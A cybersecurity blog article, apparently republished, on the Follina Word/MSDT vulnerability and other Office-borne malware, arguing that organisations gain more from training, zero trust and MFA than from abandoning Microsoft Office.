Does Follina Mean It’s Time to Abandon Microsoft Office?
As a freelance writer, I spend most of my day working in Microsoft Word. Then, I send drafts to clients and companies across the globe. So, news of the newly discovered Microsoft Office vulnerability made me concerned about the possibility of accidentally spreading malware to my clients. I take extra precautions to ensure that I’m not introducing risk to my clients. Still, using Microsoft Office was something I did many times a day without a second thought.
I brought up the issue to a few of my clients. I was not the only one deciding if their company should abandon Microsoft Office for security reasons. The second question that came up was whether the other alternatives are actually safer. Like many things in business, the decision to use Microsoft Office comes down to a risk-versus-benefits decision.
At the end of May, UK-based cybersecurity expert and threat researcher Kevin Beaumont discovered Follina. Beaumont wrote that he picked the name because he found the number 0438 in the malicious code. That number is the area code of the Italian town Follina.
With Follina, attackers could take advantage of a vulnerability in Microsoft’s Support Diagnostic Tool to remotely control devices and systems. However, as WIRED explains, the vulnerability spreads through altered Word documents. The attackers use social engineering to get a user to download the infected file and then spread malicious code.
By remotely activating a template, the attackers retrieve an HTML file with malicious code. According to Microsoft, the attacker can then perform actions allowed by the user’s rights. They can install programs, view data, change data, delete data or create new accounts. Beaumont was especially concerned because Microsoft for Endpoints did not detect the malicious code.
Attackers were already exploiting this code ‘in the wild’. Follina is a zero-day vulnerability, meaning that defenders have zero days to find a solution. Beaumont also found evidence that the vulnerability existed in the fall of 2021 and attackers used it in April 2022. Microsoft released a patch on June 14 that fixed the vulnerability.
Follina is just the most recent example of vulnerabilities found in Microsoft products.
In 2018, criminals used three different vulnerabilities in Microsoft 365 involving downloading infected Word files to spread the Malware Zyklon. Even at the bargain price of $75, the malware could be used for a wide range of attacks. It can steal credentials, spread malware, mine cryptocurrency and launch distributed denial-of-service attacks.
Attackers also embedded macros in Word docs as a way to spread malware. In the past, they simply had to use a phishing scheme. Because macros were enabled by default, the malicious code would launch when the document opened and would then infect their system. Microsoft made it a little harder by defaulting to macros turned off. Attackers now use scare tactics to get users to turn on the macros, which then launch the malware.
More recently, Microsoft found malicious code spread through Word docs disguised as legal documents. In this case, the vulnerability was one where the document could use a malicious ActiveX control. The number of attacks (in this case, less than 10) was low. Still, it illustrates the potential of a single vulnerability in Microsoft Word.
Attackers often look for the easiest way to cause the most damage. Microsoft Office documents are the most popular work solution. So, threat actors view Microsoft Office as an easy way to spread malicious code and malware.
With more businesses having turned to Office 365 in recent years, the products are even more attractive. According to Vectra’s Office 365 Security Takeaways E-book, 97% of business decision-makers reported that their organizations extended use of Microsoft 365 as a result of the pandemic. With more people using Microsoft Office products than ever before, Microsoft products are likely to continue to be a popular vehicle for malware and other digital threats.
Office 365 documents, especially .doc and .xlsx files, are used for many different purposes, both work and personal. You may get an Excel file detailing the budget for a nonprofit group, an invoice or even a spouse sending you a draft monthly budget. Word files also run the gamut of uses — flyers for a local play, a letter from a family member or a schedule for an upcoming event.
With all of these different types of documents, it’s relatively easy for attackers to create a social engineering scheme that many people will fall for using Office 365 products. For example, a phishing email with Invoice or Budget as the subject line is generic enough that at least some people may open it, as they may even be expecting someone to send an invoice or a budget.
With criminals specifically turning to Microsoft products for their next big attack, many companies wonder if they should find another solution. Yes, there are alternate tools — Google Workspace and Apple iWork — that are not currently as popular with attackers. But is that really the right answer, especially since they will likely be targeted more if organizations make a mass switch?
For many enterprises that use all Microsoft products, switching would not be easy. Their processes and file systems are centered on Office 365, including other products such as Teams and One Drive. It’s very likely that the effort involved in a switch would not be worth the reduced risk, especially since Google and Apple products do not have the same level of productivity and integrated tools like Microsoft.
Instead of switching products, which likely will have minimal positive effects, organizations should focus on reducing risks and vulnerabilities across the board, regardless of the vehicle criminals use to spread malicious files. By instead focusing on employee training and creating a culture of cybersecurity, organizations can reduce the odds that an employee will fall for a phishing scheme.
Organizations are also turning to zero trust, which is a security framework that reduces risk, especially with a remote or hybrid workforce. Many of the techniques that are a part of zero trust reduce either the likelihood or impact of an attack. By using multi-factor authentication, organizations can reduce stolen credential attacks. In addition, micro-segmentation reduces the damage even if an employee downloads a malicious file.
It’s easy to focus on the latest vehicle for attacks. However, threat actors try to stay one step ahead and constantly change their schemes and vehicles. By instead focusing on reducing your overall risk and vulnerability, regardless of the specifics of the attack, your organization can make more progress by improving cybersecurity rather than by switching tools.
Jennifer Goforth Gregory is a freelance B2B technology content marketing writer specializing in cybersecurity. Other areas of focus include B2B, finance, tec…
4 min read – This is a time of major changes for businesses and agencies. That includes the move to the cloud and the shift to being digital-first. So, cybersecurity has moved to a front-and-center position in many companies and industries. When talking about…
3 min read – Corporate clients and cloud service providers (CSPs) are both responsible for cloud security. Clients remain accountable for governance and compliance. However, their other duties will vary depending upon the type of cloud deployment. What can cloud-native security controls do for…
4 min read – 5G is a big leap in mobile technology. It presents enterprises and service providers with capabilities for advanced applications, content delivery and digital engagement anywhere. It enables businesses with new use cases and integrated security needs to have a trusted…
As a freelance writer, I spend most of my day working in Microsoft Word. Then, I send drafts to clients and companies across the globe. So, news of the newly discovered Microsoft Office vulnerability made me concerned about the possibility of accidentally spreading malware to my clients. I take extra precautions to ensure that I’m not introducing risk to my…
You’ve heard all about shadow IT, but there’s another shadow lurking on your systems: Internet of Things (IoT) devices. These smart devices are the IoT in shadow IoT, and they could be maliciously or unintentionally exposing information. Threat actors can use that to access your systems and sensitive data, and wreak havoc upon your company. A refresher on shadow IT:…
In the cybersecurity field, large databases of known threats and vulnerabilities have often been an essential resource. These catalogs show you where to focus your efforts. They’re also a good tool for prioritizing patches to increase security and mitigate the risk of disaster. As a result, these databases need to be reliable and up-to-date and use the correct criteria to…
For full details on this research, see the X-Force Red whitepaper “Controlling the Source: Abusing Source Code Management Systems”. This material is also being presented at Black Hat USA 2022. Source Code Management (SCM) systems play a vital role within organizations and have been an afterthought in terms of defenses compared to other critical enterprise systems such as Active Directory.…
Analysis and insights from hundreds of the brightest minds in the cybersecurity industry to help you prove compliance, grow business and stop threats.
Does Follina Mean It's Time to Abandon Microsoft Office? – Security IntelligenceDoes Follina Mean It's Time to Abandon Microsoft Office? – Security Intelligence https://eliteenterprisesoftware.com/wp-content/uploads/2022/09/wp-header-logo-730.png 0 0 Alan Dickson https://secure.gravatar.com/avatar/6162a8bbc0c962bebd372efbc1908402?s=96&d=mm&r=g
Does Follina Mean It’s Time to Abandon Microsoft Office?